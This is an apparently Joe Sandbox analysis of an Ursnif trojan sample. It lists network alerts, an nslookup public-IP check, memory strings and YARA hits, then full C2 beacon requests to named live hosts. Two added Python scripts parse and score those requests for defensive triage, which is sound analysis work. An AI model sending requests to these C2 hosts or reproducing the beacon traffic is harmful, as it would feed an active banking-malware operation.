Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49856 -> 185.189.12.123:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49856 -> 185.189.12.123:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: io.immontyr.com
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe | DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe | DNS query: name: myip.opendns.com
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: global traffic | HTTP traffic detected: GET /Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: apr.intooltak.com
Source: global traffic | HTTP traffic detected: GET /GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: apr.intooltak.com
Source: global traffic | HTTP traffic detected: GET /h_2BwNYezNkzTOCsdNbfn/ryja45eec93vXnRl/PLAH_2FQyM6jDyy/KJNIgaRFr9YvYl3hMq/ZhUn0_2BE/c6mccVrcWOAEGEovJjKg/7hXIYQcexZwU5itqfu4/vIseK0jkOuaXTGkc9nGx8s/NOa1JoKkXMAzc/6TzPbRle/G6gck37gRv7BYdFnxt_2F8j/9egvDbXEUD/ENj4iL_2FV2ZRlnx_/2FW6jH0jr8uj/hM6FvZP7xEB/_2FC54ka1xMZn_/2BjzmgrQuKHtOl7aIEkp_/2Fz7UYVuMXPvSkQj/otv3Y28C6cQXgp2/IlTPgKIH6YdiOogryV/u3aMiVshcBzajZXX8/BR9 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: apr.intooltak.com
Source: global traffic | HTTP traffic detected: GET /6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: io.immontyr.com
Source: global traffic | HTTP traffic detected: POST /XXR4zdt7gL/c8rfa6di0aLY9fgZ7/eabelAedxPIp/icfexNsFKv6/MZ0OW72uAREGVI/IG_2FDcTxT0eyAWdMCKCF/JStGuje_2FFLrmQY/RzT3oqYbsvN_2B0/zPieMjusYDKgzk_2Fo/3zXAxuK0i/prSNBjQgYx6raC2a8Jwa/8N8dGY9X9RfbbN1Bv3p/owXAwWB7tQ6BLsyGDmeL4f/TkwXiqJh28A6z/I03OEFID/PW89wtlpyKFCUi1HmrshXBp/rGtQtZl4aR/9TSRaifJSVZfaHvcM/VXTHUZsAPl3x/FQELGTYQh89/NyrmkOg6psA2Qr/kXGGS9vg5NJjazC_2/B HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Content-Length: 2 | Host: io.immontyr.com
Source: Joe Sandbox View | ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
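The Snort rules above fire on the shape of the beacon URIs (the _2B and _2F tokens), and the extracted configuration names two C2 domains, yet the requests carrying the Win64 user agent go to io.immontyr.com, a host absent from that configuration and the one the report records explorer.exe querying. The Python below is an added example, not Joe Sandbox code, that parses request lines in the flattened form a sandbox export uses (headers run together after the request line, or separated by " | ") and triages each against the configuration. The three malicious request strings are copied from this report; the www.example.com request is constructed for contrast. Reading _2B and _2F as escaped base64 '+' and '/' is an assumption of this example, not something the report states.

```python
# Added example: parse flattened HTTP request lines and triage them against
# the Ursnif config extracted in this report. Not Joe Sandbox code.
import json
import re

# Subset of the "Malware Configuration" block above (keys omitted; not needed here).
CONFIG = json.loads(
    '{"c2_domain": ["apr.intooltak.com", "app.querosityproject.com"], '
    '"botnet": "1000", "server": "770", "sleep_time": "5"}'
)

# Header names that the export prints run together on one line.
HEADER_NAMES = ("Cache-Control", "Connection", "Pragma", "User-Agent", "Content-Length", "Host")
# Optional " | " in front of a header name so lines with or without separators both parse.
_HEADER_SPLIT = re.compile(r"(?:\s*\|\s*)?(" + "|".join(re.escape(h) for h in HEADER_NAMES) + r"):\s*")
_REQUEST_LINE = re.compile(r"(GET|POST)\s+(\S+)\s+HTTP/1\.[01]")

# The ET Snort rules that fired name the "_2B" (M1) and "_2F" (M2) URI tokens.
# Treating them as escaped base64 '+' and '/' is this example's assumption.
URI_TOKENS = ("_2B", "_2F")
_SEGMENT = re.compile(r"^[A-Za-z0-9_]+$")


def parse_flat_request(text):
    """Split 'GET /p HTTP/1.1Cache-Control: no-cache...Host: x' into (method, path, headers)."""
    m = _REQUEST_LINE.match(text)
    if not m:
        raise ValueError("not a request line: " + text[:40])
    parts = _HEADER_SPLIT.split(text[m.end():])  # ['', name, value, name, value, ...]
    headers = {name: value.strip() for name, value in zip(parts[1::2], parts[2::2])}
    return m.group(1), m.group(2), headers


def looks_like_ursnif_uri(path, min_segments=6):
    """Deeply nested path of base64-like segments that carries _2B/_2F tokens."""
    segments = [s for s in path.split("/") if s]
    if len(segments) < min_segments or not all(_SEGMENT.match(s) for s in segments):
        return False
    return any(tok in path for tok in URI_TOKENS)


def triage(flat_requests):
    """One finding per request: is the host a known C2, does the URI fit the beacon shape?"""
    findings = []
    for text in flat_requests:
        method, path, hdr = parse_flat_request(text)
        host = hdr.get("Host", "")
        findings.append({
            "method": method,
            "host": host,
            "host_in_config": host in CONFIG["c2_domain"],
            "ursnif_uri": looks_like_ursnif_uri(path),
            "win64_ua": "Win64" in hdr.get("User-Agent", ""),
            "body_len": int(hdr.get("Content-Length", "0")),
        })
    return findings


SAMPLE_REQUESTS = [
    # copied from the report
    "GET /Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com",
    "GET /6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com",
    "POST /XXR4zdt7gL/c8rfa6di0aLY9fgZ7/eabelAedxPIp/icfexNsFKv6/MZ0OW72uAREGVI/IG_2FDcTxT0eyAWdMCKCF/JStGuje_2FFLrmQY/RzT3oqYbsvN_2B0/zPieMjusYDKgzk_2Fo/3zXAxuK0i/prSNBjQgYx6raC2a8Jwa/8N8dGY9X9RfbbN1Bv3p/owXAwWB7tQ6BLsyGDmeL4f/TkwXiqJh28A6z/I03OEFID/PW89wtlpyKFCUi1HmrshXBp/rGtQtZl4aR/9TSRaifJSVZfaHvcM/VXTHUZsAPl3x/FQELGTYQh89/NyrmkOg6psA2Qr/kXGGS9vg5NJjazC_2/B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com",
    # constructed benign request for contrast
    "GET /index.html HTTP/1.1Connection: Keep-AliveHost: www.example.com",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_REQUESTS):
        print(f)
```

The second and third findings are the ones worth acting on: io.immontyr.com is not in the static configuration, so a blocklist built only from the extractor output would miss it, while the URI shape check still flags it. The Win64 user agent on those requests, versus the plain Windows NT 10.0 string on the apr.intooltak.com requests, is consistent with the report's note that the 64-bit explorer.exe, not the 32-bit dropper, issued the io.immontyr.com traffic.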
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000000C.00000003.487223074.000001777B372000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobp/
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.572331191.0000017700001000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmp | String found in binary or memory: http://twitter.com/spotifyg
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000016.00000000.543937069.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495631696.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527688751.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownDNS traffic detected: queries for: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /h_2BwNYezNkzTOCsdNbfn/ryja45eec93vXnRl/PLAH_2FQyM6jDyy/KJNIgaRFr9YvYl3hMq/ZhUn0_2BE/c6mccVrcWOAEGEovJjKg/7hXIYQcexZwU5itqfu4/vIseK0jkOuaXTGkc9nGx8s/NOa1JoKkXMAzc/6TzPbRle/G6gck37gRv7BYdFnxt_2F8j/9egvDbXEUD/ENj4iL_2FV2ZRlnx_/2FW6jH0jr8uj/hM6FvZP7xEB/_2FC54ka1xMZn_/2BjzmgrQuKHtOl7aIEkp_/2Fz7UYVuMXPvSkQj/otv3Y28C6cQXgp2/IlTPgKIH6YdiOogryV/u3aMiVshcBzajZXX8/BR9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
                    Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmpString found in binary or memory: n Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                    Source: unknownHTTP traffic detected: POST /XXR4zdt7gL/c8rfa6di0aLY9fgZ7/eabelAedxPIp/icfexNsFKv6/MZ0OW72uAREGVI/IG_2FDcTxT0eyAWdMCKCF/JStGuje_2FFLrmQY/RzT3oqYbsvN_2B0/zPieMjusYDKgzk_2Fo/3zXAxuK0i/prSNBjQgYx6raC2a8Jwa/8N8dGY9X9RfbbN1Bv3p/owXAwWB7tQ6BLsyGDmeL4f/TkwXiqJh28A6z/I03OEFID/PW89wtlpyKFCUi1HmrshXBp/rGtQtZl4aR/9TSRaifJSVZfaHvcM/VXTHUZsAPl3x/FQELGTYQh89/NyrmkOg6psA2Qr/kXGGS9vg5NJjazC_2/B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com
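                    Added triage example, not part of the Joe Sandbox report: the GET and POST paths above are long chains of alphanumeric segments carrying `_2B` and `_2F`, which fits the documented ISFB/Ursnif transport encoding, where the request is base64-encoded, URL-escaped, `%` is swapped for `_` (so `+` becomes `_2B`, `/` becomes `_2F`, `=` becomes `_3D`) and `/` separators are inserted at arbitrary offsets to mimic a deep directory tree. That encoding is stated here as an assumption about this sample; the report does not show decoded content. The Python below scores a path against those traits, reverses the encoding, and attempts a base64 decode. The two observed paths are copied from the report; the benign path and the short round-trip input are constructed.

```python
"""Heuristic triage of ISFB/Ursnif-style request paths (added example).

Assumption, not shown decoded in the report: the path is base64 text that
was URL-escaped with '%' replaced by '_' ('+' -> '_2B', '/' -> '_2F',
'=' -> '_3D'), then broken into segments by inserted '/' characters.
"""
import base64
import binascii
import re
from typing import Optional
from urllib.parse import unquote

# Two request paths copied verbatim from the report's HTTP traffic lines.
OBSERVED_PATHS = [
    "/Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I",
    "/XXR4zdt7gL/c8rfa6di0aLY9fgZ7/eabelAedxPIp/icfexNsFKv6/MZ0OW72uAREGVI/IG_2FDcTxT0eyAWdMCKCF/JStGuje_2FFLrmQY/RzT3oqYbsvN_2B0/zPieMjusYDKgzk_2Fo/3zXAxuK0i/prSNBjQgYx6raC2a8Jwa/8N8dGY9X9RfbbN1Bv3p/owXAwWB7tQ6BLsyGDmeL4f/TkwXiqJh28A6z/I03OEFID/PW89wtlpyKFCUi1HmrshXBp/rGtQtZl4aR/9TSRaifJSVZfaHvcM/VXTHUZsAPl3x/FQELGTYQh89/NyrmkOg6psA2Qr/kXGGS9vg5NJjazC_2/B",
]
# Constructed benign path, for contrast.
BENIGN_PATH = "/api/v1/users/42/profile.json"

SEGMENT_RE = re.compile(r"[A-Za-z0-9_]+")   # base64 alphabet minus '+', '/' plus the '_' escape marker
ESCAPE_RE = re.compile(r"_2[BF]|_3D")        # the three escapes base64 text can produce


def uri_score(path: str) -> int:
    """Count the ISFB traits present: many segments, every segment drawn
    from the base64-plus-underscore alphabet, and at least one '_XX' escape."""
    segments = [s for s in path.split("/") if s]
    score = 0
    if len(segments) >= 8:
        score += 1
    if segments and all(SEGMENT_RE.fullmatch(s) for s in segments):
        score += 1
    if ESCAPE_RE.search(path):
        score += 1
    return score


def is_ursnif_like(path: str) -> bool:
    """Require all three traits; this is a triage heuristic, not a signature."""
    return uri_score(path) == 3


def normalize_path(path: str) -> str:
    """Reverse the transport encoding: drop the inserted '/' separators first
    (an escape may itself be split by one, e.g. '..._2/B'), then restore '%'
    for '_' and percent-decode, leaving plain base64 text."""
    joined = path.replace("/", "")
    return unquote(joined.replace("_", "%"))


def decode_payload(path: str) -> Optional[bytes]:
    """Base64-decode the normalized path, or return None when the text cannot
    be base64 (foreign characters, or a length no padding can repair)."""
    text = normalize_path(path).rstrip("=")
    if not re.fullmatch(r"[A-Za-z0-9+/]*", text) or len(text) % 4 == 1:
        return None
    text += "=" * (-len(text) % 4)
    try:
        return base64.b64decode(text, validate=True)
    except binascii.Error:
        return None


def encode_payload(data: bytes, chunk: int = 6) -> str:
    """Forward transform under the same assumption; used only to show the
    round trip on constructed input (real samples choose segment lengths
    unpredictably)."""
    b64 = base64.b64encode(data).decode("ascii")
    escaped = "".join(c if c.isalnum() else "_%02X" % ord(c) for c in b64)
    segments = [escaped[i:i + chunk] for i in range(0, len(escaped), chunk)]
    return "/" + "/".join(segments)


if __name__ == "__main__":
    for p in OBSERVED_PATHS + [BENIGN_PATH]:
        blob = decode_payload(p)
        size = "not base64" if blob is None else f"{len(blob)} bytes"
        print(f"score={uri_score(p)} flagged={is_ursnif_like(p)} decoded={size} {p[:32]}...")
    print(decode_payload(encode_payload(b"hello world")))
```

Both report paths score 3 and are flagged; the benign path scores 0. A decode of the report paths yields an opaque blob at best, since the plaintext is encrypted before encoding in ISFB, so the value of this step in practice is confirming that the text is well-formed base64 of a plausible length, which a random-looking benign path rarely is. Note the POST path ends in `..._2/B`: a rule that matches only the literal tokens `_2B` and `_2F` on the raw URI misses escapes split by an inserted slash, which is why the normalization removes separators before decoding.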

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    Yara detected Ursnif
                    Source: Yara match | File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
